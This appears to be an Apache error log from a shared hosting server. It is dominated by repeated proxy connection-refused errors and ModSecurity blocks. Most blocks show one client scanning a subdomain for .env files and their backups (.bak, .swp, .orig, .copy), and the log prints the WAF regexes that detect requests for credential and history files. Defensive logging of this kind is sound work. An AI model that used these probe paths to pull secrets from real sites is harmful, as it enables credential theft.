[Tue May 26 19:05:07.947683 2026] [proxy:error] [pid 6038:tid 6279] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.947725 2026] [proxy_http:error] [pid 6038:tid 6279] [client 208.84.100.247:24602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.948107 2026] [proxy:error] [pid 6038:tid 6239] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.948147 2026] [proxy_http:error] [pid 6038:tid 6239] [client 208.84.100.247:24560] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.948276 2026] [proxy:error] [pid 6038:tid 6279] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.948306 2026] [proxy_http:error] [pid 6038:tid 6279] [client 208.84.100.247:24602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.948555 2026] [proxy:error] [pid 6038:tid 6168] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.948597 2026] [proxy_http:error] [pid 6038:tid 6168] [client 208.84.100.247:24644] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.949489 2026] [security2:error] [pid 6038:tid 6172] [client 208.84.100.247:24500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWhi1HA3ZmGrHHEr4qUaAAAAIk"]
[Tue May 26 19:05:07.949731 2026] [proxy:error] [pid 6038:tid 6168] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.949767 2026] [proxy_http:error] [pid 6038:tid 6168] [client 208.84.100.247:24644] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.949852 2026] [proxy:error] [pid 6038:tid 6170] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.949890 2026] [proxy_http:error] [pid 6038:tid 6170] [client 208.84.100.247:24596] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.950189 2026] [proxy:error] [pid 6038:tid 6175] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.950226 2026] [proxy_http:error] [pid 6038:tid 6175] [client 208.84.100.247:24570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.950322 2026] [security2:error] [pid 6038:tid 6281] [client 208.84.100.247:24528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/app/.env"] [unique_id "ahWhi1HA3ZmGrHHEr4qUZgAAAPY"]
[Tue May 26 19:05:07.950339 2026] [proxy:error] [pid 6038:tid 6190] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.950403 2026] [proxy_http:error] [pid 6038:tid 6190] [client 208.84.100.247:24572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.950516 2026] [proxy:error] [pid 6038:tid 6271] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.950562 2026] [proxy_http:error] [pid 6038:tid 6271] [client 208.84.100.247:24628] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.950649 2026] [proxy:error] [pid 6038:tid 6239] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.950684 2026] [proxy_http:error] [pid 6038:tid 6239] [client 208.84.100.247:24560] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.950762 2026] [proxy:error] [pid 6038:tid 6170] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.950797 2026] [proxy_http:error] [pid 6038:tid 6170] [client 208.84.100.247:24596] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.950841 2026] [security2:error] [pid 6038:tid 6176] [client 208.84.100.247:24542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/backend/.env"] [unique_id "ahWhi1HA3ZmGrHHEr4qUawAAAI0"]
[Tue May 26 19:05:07.950914 2026] [proxy:error] [pid 6038:tid 6268] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.950980 2026] [proxy_http:error] [pid 6038:tid 6268] [client 208.84.100.247:24514] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.951097 2026] [proxy:error] [pid 6038:tid 6295] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.951139 2026] [proxy_http:error] [pid 6038:tid 6295] [client 208.84.100.247:24552] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.951233 2026] [proxy:error] [pid 6038:tid 6190] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.951276 2026] [proxy_http:error] [pid 6038:tid 6190] [client 208.84.100.247:24572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.951509 2026] [proxy:error] [pid 6038:tid 6271] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.951554 2026] [proxy_http:error] [pid 6038:tid 6271] [client 208.84.100.247:24628] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.951646 2026] [proxy:error] [pid 6038:tid 6268] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.951681 2026] [proxy_http:error] [pid 6038:tid 6268] [client 208.84.100.247:24514] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.951776 2026] [proxy:error] [pid 6038:tid 6219] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.951818 2026] [proxy_http:error] [pid 6038:tid 6219] [client 208.84.100.247:24522] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.952419 2026] [proxy:error] [pid 6038:tid 6219] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.952450 2026] [proxy_http:error] [pid 6038:tid 6219] [client 208.84.100.247:24522] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.952537 2026] [proxy:error] [pid 6038:tid 6244] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.952574 2026] [proxy_http:error] [pid 6038:tid 6244] [client 208.84.100.247:24618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.952659 2026] [proxy:error] [pid 6038:tid 6206] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.952693 2026] [proxy_http:error] [pid 6038:tid 6206] [client 208.84.100.247:24494] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.953179 2026] [proxy:error] [pid 6038:tid 6244] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.953213 2026] [proxy_http:error] [pid 6038:tid 6244] [client 208.84.100.247:24618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.953309 2026] [proxy:error] [pid 6038:tid 6295] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.953348 2026] [proxy_http:error] [pid 6038:tid 6295] [client 208.84.100.247:24552] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.953444 2026] [proxy:error] [pid 6038:tid 6206] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.953477 2026] [proxy_http:error] [pid 6038:tid 6206] [client 208.84.100.247:24494] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.953557 2026] [proxy:error] [pid 6038:tid 6249] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.953594 2026] [proxy_http:error] [pid 6038:tid 6249] [client 208.84.100.247:24588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.954162 2026] [proxy:error] [pid 6038:tid 6249] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.954192 2026] [proxy_http:error] [pid 6038:tid 6249] [client 208.84.100.247:24588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.954358 2026] [proxy:error] [pid 6038:tid 6175] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.954400 2026] [proxy_http:error] [pid 6038:tid 6175] [client 208.84.100.247:24570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.960689 2026] [security2:error] [pid 6038:tid 6160] [remote 217.174.148.179:44358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhi1HA3ZmGrHHEr4qUbgAA_nk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:07.968792 2026] [proxy:error] [pid 6038:tid 6221] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.968837 2026] [proxy_http:error] [pid 6038:tid 6221] [client 208.84.100.247:24694] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.968928 2026] [proxy:error] [pid 6038:tid 6202] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.968978 2026] [proxy_http:error] [pid 6038:tid 6202] [client 208.84.100.247:24690] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.969096 2026] [proxy:error] [pid 6038:tid 6197] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.969155 2026] [proxy_http:error] [pid 6038:tid 6197] [client 208.84.100.247:24752] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.969373 2026] [proxy:error] [pid 6038:tid 6287] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.969433 2026] [proxy_http:error] [pid 6038:tid 6287] [client 208.84.100.247:24760] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.969520 2026] [proxy:error] [pid 6038:tid 6221] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.969566 2026] [proxy_http:error] [pid 6038:tid 6221] [client 208.84.100.247:24694] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.969667 2026] [proxy:error] [pid 6038:tid 6202] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.969701 2026] [proxy_http:error] [pid 6038:tid 6202] [client 208.84.100.247:24690] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.969785 2026] [proxy:error] [pid 6038:tid 6197] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.969819 2026] [proxy_http:error] [pid 6038:tid 6197] [client 208.84.100.247:24752] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.970091 2026] [proxy:error] [pid 6038:tid 6171] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.970137 2026] [proxy_http:error] [pid 6038:tid 6171] [client 208.84.100.247:24702] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.970280 2026] [proxy:error] [pid 6038:tid 6287] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.970320 2026] [proxy_http:error] [pid 6038:tid 6287] [client 208.84.100.247:24760] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.970426 2026] [proxy:error] [pid 6038:tid 6259] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.970473 2026] [proxy_http:error] [pid 6038:tid 6259] [client 208.84.100.247:24766] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.971194 2026] [proxy:error] [pid 6038:tid 6214] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.972076 2026] [proxy_http:error] [pid 6038:tid 6214] [client 208.84.100.247:24728] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.972189 2026] [proxy:error] [pid 6038:tid 6171] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.972232 2026] [proxy_http:error] [pid 6038:tid 6171] [client 208.84.100.247:24702] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.972485 2026] [proxy:error] [pid 6038:tid 6254] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.972532 2026] [proxy_http:error] [pid 6038:tid 6254] [client 208.84.100.247:24714] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.972657 2026] [proxy:error] [pid 6038:tid 6259] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.972703 2026] [proxy_http:error] [pid 6038:tid 6259] [client 208.84.100.247:24766] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.972881 2026] [proxy:error] [pid 6038:tid 6220] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.972930 2026] [proxy_http:error] [pid 6038:tid 6220] [client 208.84.100.247:24742] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.973310 2026] [proxy:error] [pid 6038:tid 6254] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.973353 2026] [proxy_http:error] [pid 6038:tid 6254] [client 208.84.100.247:24714] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.973516 2026] [proxy:error] [pid 6038:tid 6220] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.973564 2026] [proxy_http:error] [pid 6038:tid 6220] [client 208.84.100.247:24742] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.973761 2026] [proxy:error] [pid 6038:tid 6214] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.973790 2026] [proxy_http:error] [pid 6038:tid 6214] [client 208.84.100.247:24728] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.975195 2026] [proxy:error] [pid 6038:tid 6257] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.975266 2026] [proxy_http:error] [pid 6038:tid 6257] [client 208.84.100.247:24688] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:07.975898 2026] [proxy:error] [pid 6038:tid 6257] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:07.975936 2026] [proxy_http:error] [pid 6038:tid 6257] [client 208.84.100.247:24688] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:08.046155 2026] [security2:error] [pid 6038:tid 6247] [client 74.7.244.23:55252] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ecosol.plus.businessclubinternational.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWhjFHA3ZmGrHHEr4qUeQAA1HQ"]
[Tue May 26 19:05:08.304933 2026] [proxy:error] [pid 6038:tid 6293] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:08.305029 2026] [proxy_http:error] [pid 6038:tid 6293] [client 208.84.100.247:24500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:08.305929 2026] [proxy:error] [pid 6038:tid 6293] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:08.305983 2026] [proxy_http:error] [pid 6038:tid 6293] [client 208.84.100.247:24500] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.455026 2026] [security2:error] [pid 6038:tid 6261] [client 208.84.100.247:24528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production.copy"] [unique_id "ahWhjVHA3ZmGrHHEr4qUowAAAOI"]
[Tue May 26 19:05:09.455102 2026] [proxy:error] [pid 6038:tid 6270] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.455161 2026] [proxy_http:error] [pid 6038:tid 6270] [client 208.84.100.247:24542] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.455805 2026] [proxy:error] [pid 6038:tid 6270] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.455837 2026] [proxy_http:error] [pid 6038:tid 6270] [client 208.84.100.247:24542] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.456205 2026] [proxy:error] [pid 6038:tid 6295] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.456281 2026] [proxy_http:error] [pid 6038:tid 6295] [client 208.84.100.247:24532] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.457255 2026] [proxy:error] [pid 6038:tid 6295] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.457303 2026] [proxy_http:error] [pid 6038:tid 6295] [client 208.84.100.247:24532] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.628584 2026] [security2:error] [pid 6038:tid 6279] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhjVHA3ZmGrHHEr4qUmQAAAPQ"]
[Tue May 26 19:05:09.781546 2026] [security2:error] [pid 6038:tid 6237] [client 208.84.100.247:25004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production.swp"] [unique_id "ahWhjVHA3ZmGrHHEr4qUrgAAAMo"]
[Tue May 26 19:05:09.781720 2026] [security2:error] [pid 6038:tid 6260] [client 208.84.100.247:25012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production.orig"] [unique_id "ahWhjVHA3ZmGrHHEr4qUrwAAAOE"]
[Tue May 26 19:05:09.782132 2026] [security2:error] [pid 6038:tid 6174] [client 208.84.100.247:24966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production.backup"] [unique_id "ahWhjVHA3ZmGrHHEr4qUsgAAAIs"]
[Tue May 26 19:05:09.782314 2026] [security2:error] [pid 6038:tid 6280] [client 208.84.100.247:24942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production.bak"] [unique_id "ahWhjVHA3ZmGrHHEr4qUtwAAAPU"]
[Tue May 26 19:05:09.782321 2026] [security2:error] [pid 6038:tid 6218] [client 208.84.100.247:24926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local.orig"] [unique_id "ahWhjVHA3ZmGrHHEr4qUtgAAALc"]
[Tue May 26 19:05:09.782343 2026] [proxy:error] [pid 6038:tid 6195] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.782425 2026] [proxy_http:error] [pid 6038:tid 6195] [client 208.84.100.247:24982] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.782540 2026] [security2:error] [pid 6038:tid 6231] [client 208.84.100.247:24952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production.old"] [unique_id "ahWhjVHA3ZmGrHHEr4qUswAAAMQ"]
[Tue May 26 19:05:09.782857 2026] [security2:error] [pid 6038:tid 6256] [client 208.84.100.247:24916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local.swp"] [unique_id "ahWhjVHA3ZmGrHHEr4qUtQAAAN0"]
[Tue May 26 19:05:09.782912 2026] [security2:error] [pid 6038:tid 6180] [client 208.84.100.247:24934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local.copy"] [unique_id "ahWhjVHA3ZmGrHHEr4qUtAAAAJE"]
[Tue May 26 19:05:09.783085 2026] [proxy:error] [pid 6038:tid 6195] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.783130 2026] [proxy_http:error] [pid 6038:tid 6195] [client 208.84.100.247:24982] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.783350 2026] [proxy:error] [pid 6038:tid 6290] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.783397 2026] [proxy_http:error] [pid 6038:tid 6290] [client 208.84.100.247:24900] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.783985 2026] [proxy:error] [pid 6038:tid 6290] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.784017 2026] [proxy_http:error] [pid 6038:tid 6290] [client 208.84.100.247:24900] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.784512 2026] [security2:error] [pid 6038:tid 6183] [client 208.84.100.247:24860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.orig"] [unique_id "ahWhjVHA3ZmGrHHEr4qUvgAAAJQ"]
